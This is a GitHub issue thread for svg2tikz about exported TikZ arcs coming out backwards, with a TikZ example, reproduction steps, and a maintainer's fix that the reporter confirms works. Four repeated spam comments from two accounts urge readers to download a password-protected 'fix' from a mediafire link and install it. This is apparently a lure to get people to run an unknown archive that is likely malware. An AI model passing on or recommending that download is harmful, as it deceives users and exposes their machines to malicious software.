### ISSUE TITLE
Exported arcs are often backwards

### ISSUE THREAD

**Issue by hammondkd** [xyz2tex/svg2tikz#208]
**Describe the bug**

Exported arcs in the TikZ file are often "backwards." What I mean: given two points (a) and (b), there are four possible arcs that go through both points at the same radius, and svg2tikz often chooses the wrong one. For example, given the points (0,0) and (1,1), there are two circle centers that pass through both points with radius 1. TikZ code showing the four possible arcs is
```
\documentclass{standalone}
\usepackage{tikz}
\begin{document}
\begin{tikzpicture}
  \coordinate (a) at (0,0);
  \coordinate (b) at (1,1);
  \fill (a) circle (0.1);
  \fill (b) circle (0.1);
  \draw[black] (0,0) arc (-90:0:1);
  \draw[red] (0,0) arc (180:90:1);
  \draw[blue] (0,0) arc (-90:-360:1);
  \draw[green] (0,0) arc (180:450:1);
\end{tikzpicture}
\end{document}
```

In many SVG files, the arcs end up as the red arc when the black one was intended; other cases, the blue or green arc results. One can fix these sorts of errors by changing, say, `arc (a:b:r)` to `arc (180+b:180+a:r)` or perhaps `arc (180+b:-180+a:r)`, which effectively reflects the arc across the line between the two points and/or changes the effective order of the angles. This does not happen consistently: some paths are correct, others require inversion with 180 added to both, others require inversion with 180 added to one (typically a negative angle) and -180 added to the other (the positive angle).

This is most likely to occur if one of the resulting angles in the arc is negative.

**Setup:**
 - Mode: inkscape export
 - SVG2TikZ version: [3.1.0 / GIT checkout as of 08/26/2024]
 - OS version: Fedora 40
 - Inkscape version: 1.3.2-8

**To Reproduce**
 - Input SVG of California state flag from https://upload.wikimedia.org/wikipedia/commons/0/01/Flag_of_California.svg
 - Export to TikZ code and compile with pdflatex
 - Output result: Bear has several nearly-full cicles on him, both large and small, everywhere.

**Expected behavior**
Image should look essentially the same (with the possible exception of centimeters needing to be scaled to match the scale factor), with the arcs defined as they are in the SVG.

**Additional context**
This happens a LOT, but this particular SVG image shows it extremely obviously.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ldevillez** [comment]
Hello @hammondkd,

Thanks for the bug report :)
It should be fixed in #209. You can pull the code there otherwise I will soon release a new version with thoses changes

**Comment by hammondkd** [comment]
The new version worked perfectly on the file I tested it on. Thank you!
